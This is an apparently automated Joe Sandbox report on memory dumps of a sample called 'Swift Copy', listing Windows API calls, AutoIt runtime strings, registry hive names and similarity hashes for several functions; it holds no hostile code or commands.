                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 1996641542-0
                                              • Opcode ID: a06684f79991b487ab826c588f4f093cc801330d03799a94932f02deeea3a6ac
                                              • Instruction ID: b8e2265df091c6aa2196b1ba32f586fb00c0a3c15ef2bde226fc88e5aa319ae7
                                              • Opcode Fuzzy Hash: a06684f79991b487ab826c588f4f093cc801330d03799a94932f02deeea3a6ac
                                              • Instruction Fuzzy Hash: C4616E76D00218AFDF019FA5DC49AEE7FB9EB09320F204215F915BB2E1D771A980CB90
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00E01128
                                              • GetDesktopWindow.USER32 ref: 00E0113D
                                              • GetWindowRect.USER32(00000000), ref: 00E01144
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E01199
                                              • DestroyWindow.USER32(?), ref: 00E011B9
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E011ED
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E0120B
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E0121D
                                              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00E01232
                                              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E01245
                                              • IsWindowVisible.USER32(00000000), ref: 00E012A1
                                              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E012BC
                                              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E012D0
                                              • GetWindowRect.USER32(00000000,?), ref: 00E012E8
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00E0130E
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00E01328
                                              • CopyRect.USER32(?,?), ref: 00E0133F
                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 00E013AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: c0c976d179dc69d2e5ce6baf158225b188c4e1fe701c322c5b2eac6ab4de7c96
                                              • Instruction ID: 663515adc71450cf30f674a5fbcdd226c9a9bf25f0c54d1e7b8cab72c23f3679
                                              • Opcode Fuzzy Hash: c0c976d179dc69d2e5ce6baf158225b188c4e1fe701c322c5b2eac6ab4de7c96
                                              • Instruction Fuzzy Hash: 2CB1AC71608341AFD714DF65C884B6EBBE4FF84754F00895CF999AB2A1D731E884CBA2
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D88968
                                              • GetSystemMetrics.USER32(00000007), ref: 00D88970
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8899B
                                              • GetSystemMetrics.USER32(00000008), ref: 00D889A3
                                              • GetSystemMetrics.USER32(00000004), ref: 00D889C8
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D889E5
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D889F5
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D88A28
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D88A3C
                                              • GetClientRect.USER32(00000000,000000FF), ref: 00D88A5A
                                              • GetStockObject.GDI32(00000011), ref: 00D88A76
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D88A81
                                                • Part of subcall function 00D8912D: GetCursorPos.USER32(?), ref: 00D89141
                                                • Part of subcall function 00D8912D: ScreenToClient.USER32(00000000,?), ref: 00D8915E
                                                • Part of subcall function 00D8912D: GetAsyncKeyState.USER32(00000001), ref: 00D89183
                                                • Part of subcall function 00D8912D: GetAsyncKeyState.USER32(00000002), ref: 00D8919D
                                              • SetTimer.USER32(00000000,00000000,00000028,00D890FC), ref: 00D88AA8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: f44b002c16ed9040f69fd4476e256f5c2b0161718a97d2ea10c43861e60f46a5
                                              • Instruction ID: cdb1e9ca51db69d3633b95fd3f2ec4149a84b598a1c0036cfa473b7c71ee1588
                                              • Opcode Fuzzy Hash: f44b002c16ed9040f69fd4476e256f5c2b0161718a97d2ea10c43861e60f46a5
                                              • Instruction Fuzzy Hash: 2CB16B75A0020A9FDF14EFA9DC45BAA3BB5FB48314F144229FA15A72D0DB70E885CF61
                                              APIs
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1114
                                                • Part of subcall function 00DD10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1120
                                                • Part of subcall function 00DD10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD112F
                                                • Part of subcall function 00DD10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1136
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD114D
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0DF5
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DD0E29
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0E40
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00DD0E7A
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0E96
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0EAD
                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DD0EB5
                                              • HeapAlloc.KERNEL32(00000000), ref: 00DD0EBC
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DD0EDD
                                              • CopySid.ADVAPI32(00000000), ref: 00DD0EE4
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DD0F13
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0F35
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0F47
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0F6E
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0F75
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0F7E
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0F85
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0F8E
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0F95
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD0FA1
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0FA8
                                                • Part of subcall function 00DD1193: GetProcessHeap.KERNEL32(00000008,00DD0BB1,?,00000000,?,00DD0BB1,?), ref: 00DD11A1
                                                • Part of subcall function 00DD1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DD0BB1,?), ref: 00DD11A8
                                                • Part of subcall function 00DD1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DD0BB1,?), ref: 00DD11B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                              • String ID:
                                              • API String ID: 4175595110-0
                                              • Opcode ID: a2dcb09ff932e3b342a1471e3224a7b858e6b4d9895734a0d3519914d37b63ee
                                              • Instruction ID: 4c5366c0f8a611826e17534f75efbc8acd3f9f74cf92c56206c6dfbdcd32f022
                                              • Opcode Fuzzy Hash: a2dcb09ff932e3b342a1471e3224a7b858e6b4d9895734a0d3519914d37b63ee
                                              • Instruction Fuzzy Hash: E671407290420AAFDF209FA5DC48BEEBBB8FF44310F284216F955B6291D7719945CB70
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFC4BD
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E0CC08,00000000,?,00000000,?,?), ref: 00DFC544
                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DFC5A4
                                              • _wcslen.LIBCMT ref: 00DFC5F4
                                              • _wcslen.LIBCMT ref: 00DFC66F
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DFC6B2
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DFC7C1
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DFC84D
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFC881
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFC88E
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DFC960
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 9721498-966354055
                                              • Opcode ID: d51a33349a6a0b87588b16e2c72615ccf16a7b28640794acaaeaf5c0f2ad67b8
                                              • Instruction ID: 94a07c0f2baa351458f8ccbf3e4f48e1f592677113d33d219e5d7366d3b4c13f
                                              • Opcode Fuzzy Hash: d51a33349a6a0b87588b16e2c72615ccf16a7b28640794acaaeaf5c0f2ad67b8
                                              • Instruction Fuzzy Hash: C2127A352142059FDB14DF14C981E2AB7E5EF88714F19C85CF98A9B3A2EB31EC41CBA1
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00E009C6
                                              • _wcslen.LIBCMT ref: 00E00A01
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E00A54
                                              • _wcslen.LIBCMT ref: 00E00A8A
                                              • _wcslen.LIBCMT ref: 00E00B06
                                              • _wcslen.LIBCMT ref: 00E00B81
                                                • Part of subcall function 00D8F9F2: _wcslen.LIBCMT ref: 00D8F9FD
                                                • Part of subcall function 00DD2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DD2BFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 1103490817-4258414348
                                              • Opcode ID: eb0624db911c265ce1dbaa71ac33a300b2039503cb4132296d05add8867017ed
                                              • Instruction ID: a4aad1419aeb93ed143e75024e669543c48042186f9ed91b7b93f238d00b4fb2
                                              • Opcode Fuzzy Hash: eb0624db911c265ce1dbaa71ac33a300b2039503cb4132296d05add8867017ed
                                              • Instruction Fuzzy Hash: 79E1AE312083019FC714EF24C451A6AB7E1FF98318F54995DF89AAB3A2D730ED85CBA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 1256254125-909552448
                                              • Opcode ID: 61ce47ddd69c36a9ac8e58f64b104db1dee7941bdaf437f52cd6e675c00f804d
                                              • Instruction ID: afba2b1cae2e2b178ae7e955d05b07b405e9d8f26a376e8a1fe970aafde3cc15
                                              • Opcode Fuzzy Hash: 61ce47ddd69c36a9ac8e58f64b104db1dee7941bdaf437f52cd6e675c00f804d
                                              • Instruction Fuzzy Hash: E271193262012E8BCB20DE3CCE525BE3391DFA0754F1AA528FD95A7284E631DD65C7B0
                                              APIs
                                              • _wcslen.LIBCMT ref: 00E0835A
                                              • _wcslen.LIBCMT ref: 00E0836E
                                              • _wcslen.LIBCMT ref: 00E08391
                                              • _wcslen.LIBCMT ref: 00E083B4
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E083F2
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00E0361A,?), ref: 00E0844E
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E08487
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E084CA
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E08501
                                              • FreeLibrary.KERNEL32(?), ref: 00E0850D
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E0851D
                                              • DestroyIcon.USER32(?), ref: 00E0852C
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E08549
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E08555
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 799131459-1154884017
                                              • Opcode ID: 10a442db9943532e49d353c295726208c1c705509d37f1130fb292db9b123cc1
                                              • Instruction ID: 3ccad150b56b8adc451e7cbe350e8cd381eb094d8ee4919089bc2b4c2df15dd9
                                              • Opcode Fuzzy Hash: 10a442db9943532e49d353c295726208c1c705509d37f1130fb292db9b123cc1
                                              • Instruction Fuzzy Hash: 8B61EF71500219BEEB14DF64CD85FBE7BA8FB04B21F205609F855E61D1DB74A980CBA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 0-1645009161
                                              • Opcode ID: 68662536c01653fa57e26f676a7f025b0711355cc4d64fb5339eb28d81bc9ca1
                                              • Instruction ID: cc6521e06ae7a7ee4acb59bcd80d60fb9184235657e6ad07485f8e3a84f82daf
                                              • Opcode Fuzzy Hash: 68662536c01653fa57e26f676a7f025b0711355cc4d64fb5339eb28d81bc9ca1
                                              • Instruction Fuzzy Hash: 1C812371A04305BBDB25AF64DC92FEE77A8EF15740F088424F809AA186FB71DA51C7B1
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 00DD5A2E
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DD5A40
                                              • SetWindowTextW.USER32(?,?), ref: 00DD5A57
                                              • GetDlgItem.USER32(?,000003EA), ref: 00DD5A6C
                                              • SetWindowTextW.USER32(00000000,?), ref: 00DD5A72
                                              • GetDlgItem.USER32(?,000003E9), ref: 00DD5A82
                                              • SetWindowTextW.USER32(00000000,?), ref: 00DD5A88
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DD5AA9
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DD5AC3
                                              • GetWindowRect.USER32(?,?), ref: 00DD5ACC
                                              • _wcslen.LIBCMT ref: 00DD5B33
                                              • SetWindowTextW.USER32(?,?), ref: 00DD5B6F
                                              • GetDesktopWindow.USER32 ref: 00DD5B75
                                              • GetWindowRect.USER32(00000000), ref: 00DD5B7C
                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DD5BD3
                                              • GetClientRect.USER32(?,?), ref: 00DD5BE0
                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00DD5C05
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DD5C2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                              • String ID:
                                              • API String ID: 895679908-0
                                              • Opcode ID: f8a155c22e6828291776a9aab54d33cfecc22f3a3ca304661743018af7475826
                                              • Instruction ID: 0d0f769794c8ccc2f6c2fccc93025b5ba5e8d9e1d1637ea0cbd7a7b5ad84711e
                                              • Opcode Fuzzy Hash: f8a155c22e6828291776a9aab54d33cfecc22f3a3ca304661743018af7475826
                                              • Instruction Fuzzy Hash: FC717F31900B05AFDB20DFA9DD85B6EBBF5FF48704F14461AE182A26A4D775E944CF20
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
                                              • API String ID: 176396367-1901692981
                                              • Opcode ID: 3c47d3bc829e5809837bb4ccb41cecb74dd4b090942c14621cf9616e6d2f1ed8
                                              • Instruction ID: c767b147dda596665041bd388c085769bec3d09b4ba23fdf862f6758321a4fcc
                                              • Opcode Fuzzy Hash: 3c47d3bc829e5809837bb4ccb41cecb74dd4b090942c14621cf9616e6d2f1ed8
                                              • Instruction Fuzzy Hash: D0E19532A00616ABCB189FA8C8556EDFBB4FF54750F58811BE456B7340DB30AE49CBB1
                                              APIs
